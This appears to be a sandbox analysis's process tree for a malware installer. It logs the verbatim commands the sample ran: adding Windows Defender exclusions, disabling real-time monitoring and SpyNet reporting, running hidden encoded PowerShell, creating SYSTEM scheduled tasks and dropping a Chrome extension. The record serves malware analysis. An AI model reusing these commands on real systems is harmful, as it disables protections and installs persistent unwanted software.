PID 3040 wrote to memory of 2656 3040 cmd.exe 38 PID 3040 wrote to memory of 2656 3040 cmd.exe 38 PID 3040 wrote to memory of 2656 3040 cmd.exe 38 PID 2672 wrote to memory of 2540 2672 cmd.exe 39 PID 2672 wrote to memory of 2540 2672 cmd.exe 39 PID 2672 wrote to memory of 2540 2672 cmd.exe 39 PID 2672 wrote to memory of 2540 2672 cmd.exe 39 PID 2672 wrote to memory of 2540 2672 cmd.exe 39 PID 2672 wrote to memory of 2540 2672 cmd.exe 39 PID 2672 wrote to memory of 2540 2672 cmd.exe 39 PID 3040 wrote to memory of 1820 3040 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe"C:\Users\Admin\AppData\Local\Temp\992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Users\Admin\AppData\Local\Temp\7zS4B81.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe.\Install.exe /iEsqfdidqlc "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2672 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2628
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2540
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:3040 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:2656
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1820
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHwkgOEXO" /SC once /ST 01:58:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2524
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gHwkgOEXO"4⤵PID:2660
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gHwkgOEXO"4⤵PID:1900
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bioYAMjDPNiNoqxvcS" /SC once /ST 03:48:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\wAuKxhFMAdiQGsoHy\SofgVcoVSWNQWUG\nOIexXf.exe\" 0l /FVsite_idwnl 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1200
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {C69B626C-8248-4485-9B70-CA85A469FF3F} S-1-5-21-3425689832-2386927309-2650718742-1000:AWDHTXES\Admin:Interactive:[1]1⤵PID:2340
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:3012
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2588 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2228
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:388 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2876
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1788 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1020
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2236
-
C:\Windows\system32\taskeng.exetaskeng.exe {FDF23144-6960-4759-B638-6BFAD8FEF156} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2592
-
C:\Users\Admin\AppData\Local\Temp\wAuKxhFMAdiQGsoHy\SofgVcoVSWNQWUG\nOIexXf.exeC:\Users\Admin\AppData\Local\Temp\wAuKxhFMAdiQGsoHy\SofgVcoVSWNQWUG\nOIexXf.exe 0l /FVsite_idwnl 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:776 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gefzoWomw" /SC once /ST 02:24:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:944
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gefzoWomw"3⤵PID:2104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gefzoWomw"3⤵PID:1904
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2388
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1876
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1536
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:620
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gNhrCJPBD" /SC once /ST 02:33:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2024
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gNhrCJPBD"3⤵PID:1616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gNhrCJPBD"3⤵PID:856
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:323⤵PID:2196
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:643⤵PID:1608
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1604
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:323⤵PID:2852
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:324⤵PID:2444
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:643⤵PID:1448
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:644⤵PID:2404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\eogxozCJrYNgvSKM\ITmHmezW\tlXEKHzJFwIVIpjI.wsf"3⤵PID:1120
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\eogxozCJrYNgvSKM\ITmHmezW\tlXEKHzJFwIVIpjI.wsf"3⤵
- Modifies data under HKEY_USERS
PID:3032 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IUaOUdhiTQgU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IUaOUdhiTQgU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TNrIrJXzU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TNrIrJXzU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UbaivrmHqZUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UbaivrmHqZUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VgjyoxcUurXmC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VgjyoxcUurXmC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dACkfQRkXjMlVDtnXZR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dACkfQRkXjMlVDtnXZR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\JiflobLJSPStBDVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\JiflobLJSPStBDVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\wAuKxhFMAdiQGsoHy" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\wAuKxhFMAdiQGsoHy" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IUaOUdhiTQgU2" /t REG_DWORD /d 0 /reg:324⤵PID:548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IUaOUdhiTQgU2" /t REG_DWORD /d 0 /reg:644⤵PID:1984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TNrIrJXzU" /t REG_DWORD /d 0 /reg:324⤵PID:536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TNrIrJXzU" /t REG_DWORD /d 0 /reg:644⤵PID:944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UbaivrmHqZUn" /t REG_DWORD /d 0 /reg:644⤵PID:2244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UbaivrmHqZUn" /t REG_DWORD /d 0 /reg:324⤵PID:2056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VgjyoxcUurXmC" /t REG_DWORD /d 0 /reg:324⤵PID:2100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VgjyoxcUurXmC" /t REG_DWORD /d 0 /reg:644⤵PID:1720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dACkfQRkXjMlVDtnXZR" /t REG_DWORD /d 0 /reg:324⤵PID:1552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dACkfQRkXjMlVDtnXZR" /t REG_DWORD /d 0 /reg:644⤵PID:2276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\JiflobLJSPStBDVB" /t REG_DWORD /d 0 /reg:324⤵PID:2708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\JiflobLJSPStBDVB" /t REG_DWORD /d 0 /reg:644⤵PID:1676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\wAuKxhFMAdiQGsoHy" /t REG_DWORD /d 0 /reg:324⤵PID:1476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:1672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\wAuKxhFMAdiQGsoHy" /t REG_DWORD /d 0 /reg:644⤵PID:1488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:324⤵PID:1376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:644⤵PID:1104
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gGELJmCBB" /SC once /ST 01:22:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1896
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gGELJmCBB"3⤵PID:3048
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gGELJmCBB"3⤵PID:2188
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1568
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2196
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1604
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2424
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YjdyicABEfUJyYqxF" /SC once /ST 02:08:21 /RU "SYSTEM" /TR "\"C:\Windows\Temp\eogxozCJrYNgvSKM\yqBNUoJESotNheK\ihlHohq.exe\" I7 /Qmsite_idusM 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1940
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "YjdyicABEfUJyYqxF"3⤵PID:2776
-
-
-
C:\Windows\Temp\eogxozCJrYNgvSKM\yqBNUoJESotNheK\ihlHohq.exeC:\Windows\Temp\eogxozCJrYNgvSKM\yqBNUoJESotNheK\ihlHohq.exe I7 /Qmsite_idusM 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1240 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bioYAMjDPNiNoqxvcS"3⤵PID:2316
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1820
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:2528
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:2516
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:3040
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\TNrIrJXzU\jcdKGA.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "RkwdBuXRacmpEbY" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2792
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RkwdBuXRacmpEbY2" /F /xml "C:\Program Files (x86)\TNrIrJXzU\PDbNsDW.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1332
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "RkwdBuXRacmpEbY"3⤵PID:2020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "RkwdBuXRacmpEbY"3⤵PID:1076
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ulMIPatxpFafmD" /F /xml "C:\Program Files (x86)\IUaOUdhiTQgU2\iFNdmmj.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2180
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kuMWFrkDPqCqj2" /F /xml "C:\ProgramData\JiflobLJSPStBDVB\nDMAjhZ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2000
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "idGglYgIlRbjxykKx2" /F /xml "C:\Program Files (x86)\dACkfQRkXjMlVDtnXZR\UnKuZpK.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1920
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EvJmcymORqECUgpBZDb2" /F /xml "C:\Program Files (x86)\VgjyoxcUurXmC\MInXURM.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1764
-
-
